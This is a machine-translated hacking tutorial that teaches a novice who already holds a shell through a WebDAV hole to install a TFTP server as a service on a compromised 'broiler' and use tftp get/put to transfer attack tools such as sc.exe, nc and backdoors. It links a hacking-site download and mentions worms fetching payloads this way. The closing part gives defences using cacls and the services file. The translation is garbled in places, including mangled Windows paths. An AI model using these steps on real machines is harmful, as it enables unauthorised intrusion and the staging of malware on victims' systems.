Cainiao A obtained A shell by exploiting the popular webdav vulnerability. However, after adding an administrator account, he found that after an Administrator account is created, he cannot connect to ipc $, you cannot enable ipc $ in cmd, and a startup error is prompted. So how to upload files? Cainiao heard that ftp can be used, but ftp cannot achieve interaction in the cmd environment, which will harm people. After ftp is input, the cmd will not stop there? Cainiao is dumpfounded. Some people say that they use the echo command to write a file for downloading the program from the specified ftp, and then download it through the ftp-s: file command. This is feasible in practice, however, cainiao feels a little troublesome. What should I do?
At this moment, a sound sounded in your ears: use tftp to make you happy. Tftp ?! @ # $ ^ & *, The cainiao thought about it for a while. I have heard of ftp. What is tftp? Today, I will explain to the cainiao how to install and use it, its role in intrusion, and my own experiences.
I. Introduction to TFTP:
Tftp is short for Trivial File Transfer Protocol. It is translated as a simple File Transfer Protocol. It is a Protocol used in the TCP/IP Protocol family to transmit simple files between the client and the server, although there are a few features, it helps a lot in our intrusion.
The difference between Tftp and the Ftp server that comes with Win2K and the popular Serv-u is that Tftp is carried on the UDP port; compared with Ftp, TFTP is much smaller; the defect is that its data stream transmission service is not *. It does not provide access authorization and authentication mechanisms, and uses the timeout retransmission method to ensure data arrival. It uses UDP port 69. However, because it uses UDP ports, it is easy to get rid of firewall restrictions and IP Security Policies to review ports, which can be used flexibly during intrusion, this is why I want to introduce it to you.
Ii. Enable the TFTP service:
To obtain the Administrator permission. Ghost is a cute tool that comes with Microsoft. We can use it to start the Tftp service for bots, so we don't have to worry about finding the tftp server. We can find tftp.exeunder winntsystem32of win2kand tftp.exe under winntsystem32dllcache. Of course, you can enter dir % windir % ftp */s in the command line (indicating to search for the tftp prefix program in all subdirectories of the % windir % directory ). The information provided by my machine is as follows:
The volume in drive C is not labeled. The serial number of the volume is 287C-D610.
C: WINNTsystem32 directory
17,680 tftp.exe
1 file, 17,680 bytes
C: WINNTsystem32dllcache directory
17,680 tftp.exe
19,728 tftpd.exe
2 files in 37,408 bytes
As you can see, there is a tftpd.exe program, which is the server program of the tftp server. How can I enable the tftp service for broilers and double-click it to run it? -Install? Ghost is its gui version. See the figure below.
1: Let's take a look at its description:
C: Longker> instsrv.exe
Installand removes system services from NT
INSTSRV <service name> (<exe location> | REMOVE) [-a <Account Name>] [-p <Account Password>]
Install service example:
INSTSRV MyService C: MyDirDiskService. Exe
-OR-
INSTSRV MyService C: mailsrvmailsrv.exe-a MYDOMAINjoebob-p foo
Remove service example:
INSTSRV MyService REMOVE
Then we will install tftp as a service:
C: Longker> instsrv "Tftp services" c: winntsystem32dllcacheftpd.exe
The service was successfuly added!
Make sure that you go into the Control Panel and use
The Services applet to change the Account Name and
Password that this newly installed service will use
For its Security Context.
In this way, we have installed the tftp service. The service name is Tftp services, and we will start it below:
C: Longker> net start "tftp services"
The Tftp services Service is starting.
The Tftp services Service has been started successfully.
OK. The service has been started successfully. We can use fport to check the port enabling status:
1524 tftpd-> 69 UDP c: winntsystem32dllcacheftpd.exe
We can see that the UDP protocol is used for file transmission, and the enabled port is 69.
Or we can use the following command to query:
C: Longker> netstat-an | find "69"
Netstat-an | find "69"
UDP 202. xx. xx.165: 69 *:*
After the service is started successfully, the tftpdroot folder will be generated in the system and directory. Here we will upload and provide the downloaded files.
Here, we recommend a good Tftp server for you. It has the logging and directory setting functions and shows the transmission progress. The most important thing is that it is free and can be used on multiple platforms.
Http://5ihack.vicp.net: 88/down/show. asp? Id = 219
Iii. How to use Tftp:
TFTP comes with help information:
TFTP [-I] host [GET | PUT] source [destination]
-I Specifies binary image transfer mode (also called
Octet). In binary image mode the file is moved
Literally, byte by byte. Use this mode when transferring binary files.
Host Specifies the local or remote host.
GET Transfers the file destination on the remote host
The file source on the local host.
PUT Transfers the file source on the local host
The file destination on the remote host.
Source Specifies the file to transfer.
Destination Specifies where to transfer the file.
Note:
-The I option transfers files in binary mode. Many Exploit code needs to be transmitted in this mode.
The Host is the Host with the tftp service enabled, either local or remote.
Get is to download the file to the running directory, and put is to upload the file to the machine that has enabled the tftp service. Source is the name of the file to be uploaded or downloaded.
Here are a few columns:
C: Longker> tftp-I 202. xx. xx.165 get SC .exe
Tftp-I 202. xx. xx.165 get SC .exe
Transfer successful: 63248 bytes in 1 second, 63248 bytes/s
This is to download the SC .exe program from the perspective of the tftpservice. The speed is good :)
C: Longker> tftp-i 202. xx. xx.165 put SC .exe
Tftp-I 202. xx. xx.165 put SC .exe
Transfer successful: 63248 bytes in 1 second, 63248 bytes/s
Upload: uploads SC .exe to the tftp server.
4. Answers to related questions:
Because tftp comes with Microsoft, we can use it to upload the tools we need after intruding into a machine, instead of downloading other tools. Download (a small tool that can download programs from the web server), and then use wget to download your own toolkit.
The problem above is solved, but maybe cainiao will still encounter some problems. For example, when you want to delete the uploaded file, an error message is displayed: access is denied! What's going on? My uploaded files cannot be deleted, which is too fake. This is because the files uploaded and downloaded using tftp have the read-only attribute by default, so we need to use attrib-R to remove its read-only attribute before deletion.
As you know, many network worms or hacker attack programs attempt to obtain command line running permissions through a certain vulnerability, worms often use the tftp client program provided by Windows to obtain required attack programs or backdoor programs, such as nc tools. For example, the popular asp Trojan, cmd. asp can also be used to call tftp to download the tool and obtain system administrator privileges. Readers who pay attention to security may ask, How can I prevent intruders from using tftp in case my machine is intruded? I will introduce two methods here.
1: You can use cacls to restrict user access to the program.
C:> cacls
Display or modify the access control table (ACL) of a file)
CACLS filename [/T] [/E] [/C] [/G user: perm] [/R user [...]
[/P user: perm [...] [/D user [...]
Filename displays the ACL.
/T to change the ACL of the specified file in the current directory and all its subdirectories.
/E. Edit the ACL without replacing it.
/C continues when an access denial error occurs.
/G user: perm grants the specified user access permission.
Perm can be: R read W Write C Change (write) F full control
/R user revokes the access permission of the specified user (only valid when used with/E ).
/P user: perm replaces the access permission of the specified user.
Perm can be: N no R read W Write C Change (write) F full control
/D the user rejects access from the specified user.
You can use wildcards to specify multiple files in the command. You can also specify multiple users in the command.
Related help information, we can disable the iusr_computernameuser's permission to run tftp.exe.
C:> cacls c: winntsystem32ftp.exe/D iusr_computername
C:> cacls c: winntsystem32dllcacheftp.exe/D iusr_computername
Are you sure you want to (Y/N )? Y
Processed file: c: winntsystem32ftp.exe
Processed file: c: winntsystem32dllcacheftp.exe
C:> tftp
Access denied.
Obviously, we have achieved our goal. However, we can disable iusrusers' calls to cmd.exe.
2: Can we delete tftp in the future? Otherwise, because key programs such as tftp.exe are protected by the Windows File Protection System, they cannot be changed directly. Here we will introduce another method,
Use the text editing tool to open the service file under % systemroot % system32driversetc and find the corresponding tftp line:
Bootps 67/udp dhcps # Bootstrap Protocol Server
Bootpc 68/udp dhcpc # Bootstrap Protocol Client
Tftp 69/udp # Trivial File Transfer
Replace 69/udp with 0/udp to save and exit. Let's try again to see if tftp can be used?
How about it? The prompt "timeout occurred" has also reached our goal.